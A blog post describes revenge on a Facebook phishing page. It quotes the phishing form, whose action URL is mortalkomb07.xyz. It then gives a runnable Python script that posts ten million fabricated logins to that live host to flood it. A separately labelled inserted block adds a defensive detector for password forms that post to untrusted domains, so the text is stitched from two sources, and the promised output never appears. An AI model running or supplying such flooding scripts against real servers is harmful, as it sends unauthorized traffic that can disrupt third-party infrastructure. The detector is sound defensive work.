Have you ever received a message from a friend whose Facebook account had unfortunately been hacked?
Phishing is when an untrustworthy website impersonates a legitimate one in order to collect visitors' login information.
I really dislike phishers, so I decided maybe I would get revenge. Five of my friends sent me a "video" just today.
I clicked on the "video", and it took me to a fake Facebook login page. I looked at the page source and saw this HTML:
<form method="post" action="https://mortalkomb07.xyz//save.php?api=1&lan=facebooknew&ht=1&counter0=combo1407" class="mobile-login-form _5spm" id="login_form" data-sigil="m_login_form" data-autoid="autoid_2" data-countryinsert="true">
...
<input name="pass" type="password">
<input name="username" type="text">
...
</form>
I decided I would send fake login requests of my own and hopefully overwhelm them with false data, at least delaying them from attacking other, real accounts.
I loaded some fake usernames, passwords, and country data (which the form also submitted).
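The form above is the tell: a page styled as the Facebook login posts the password field to mortalkomb07.xyz, a host unrelated to Facebook. As an added example (not code from the original post), the following Python script uses only the standard library to parse form markup and flag any form that contains a password field but posts to a host outside an expected set of trusted domains. The sample markup is the form quoted above, trimmed; the page URL and the trusted-suffix list are assumptions chosen for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the phishing form quoted above, trimmed to the relevant tags.
SAMPLE_HTML = """
<form method="post" action="https://mortalkomb07.xyz//save.php?api=1&lan=facebooknew&ht=1&counter0=combo1407"
      class="mobile-login-form _5spm" id="login_form" data-sigil="m_login_form">
<input name="pass" type="password">
<input name="username" type="text">
</form>
"""


class FormCollector(HTMLParser):
    """Collect every <form> on a page together with the (name, type) of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (a.get("name") or "", (a.get("type") or "text").lower())
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_of(url):
    """Lower-cased hostname of a URL, or "" for a relative URL with no host."""
    return (urlsplit(url).hostname or "").lower()


def is_trusted(host, trusted_suffixes):
    """True if host equals a trusted suffix or is a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in trusted_suffixes)


def find_credential_exfil(html, page_url, trusted_suffixes=("facebook.com",)):
    """Return one finding per form that has a password field but submits to an untrusted host.

    A relative action posts back to the page's own host, so that host is used as the fallback.
    """
    parser = FormCollector()
    parser.feed(html)
    page_host = host_of(page_url)
    findings = []
    for form in parser.forms:
        if not any(t == "password" for _, t in form["inputs"]):
            continue
        action_host = host_of(form["action"]) or page_host
        if not is_trusted(action_host, trusted_suffixes):
            findings.append({
                "action_host": action_host,
                "page_host": page_host,
                "method": form["method"],
                "fields": [name for name, _ in form["inputs"]],
            })
    return findings


if __name__ == "__main__":
    # Hypothetical page URL; the real landing page URL is not reproduced here.
    for f in find_credential_exfil(SAMPLE_HTML, "https://example.invalid/video"):
        print("password form posts to untrusted host", f["action_host"], "with fields", f["fields"])
```

Run against a saved copy of a suspicious login page, the script prints each credential form whose action host is not under a trusted domain; the same check is the core of what browser phishing-protection heuristics and mail gateways do before a user ever types a password.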
Setup
First, we import some libraries.
Then, we load some fake data.
import requests
import random
import string
import json

# The phishing form's action URL, copied from the page source above
url = 'https://mortalkomb07.xyz//save.php?api=1&lan=facebooknew&ht=1&counter0=combo1407'
chrome_user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'

# Local JSON word lists used to build plausible-looking fake identities
firstnames = json.load(open("firstnames.json"))
surnames = json.load(open("surnames.json"))
countries_and_states = json.load(open("countries_and_states.json"))['countries']
email_domains = ['yahoo.com', 'gmail.com', 'hotmail.com', 'verizon.net']

letters = string.ascii_lowercase
numbers = string.digits
password_chars = string.ascii_letters + string.digits
coinflip = lambda: bool(random.randint(0, 1))
The Loop
Now, we loop 10,000,000 times.
Each time, an email gets generated based on random names and surnames.
A country and state are chosen randomly.
A password is generated as a string of random characters.
Finally, a request is sent to their server.
for x in range(10000000):
    email = ''
    # first name
    email += random.choice(firstnames).lower()
    # add a surname
    if coinflip():
        email += "." if coinflip() else ""
        email += random.choice(surnames).lower()
    if coinflip():
        email += str(random.randint(0, 100))
    email += "@" + random.choice(email_domains)

    # password: 8 to 20 random letters and digits
    password = ''
    for y in range(random.randint(8, 20)):
        password += random.choice(password_chars)

    # pick a country that actually has states listed
    country_and_states = random.choice(countries_and_states)
    while len(country_and_states['states']) == 0:
        country_and_states = random.choice(countries_and_states)
    country = country_and_states['country']
    state = random.choice(country_and_states['states'])

    # send the request
    requests.post(url, {
        "ua": "",
        "email": email,
        "pass": password,
        "pais": country,
        "Country": country,
        "country": country,
        "state": state
    }, headers={
        "User-Agent": chrome_user_agent
    }, allow_redirects=False)
    print("sent", x + 1, "fake emails and passwords")
Later, the output is:
This was a fun exercise, and hopefully the scammers get held back.
Top comments (2)
wow this was a very cool exercise
Thank you Joshua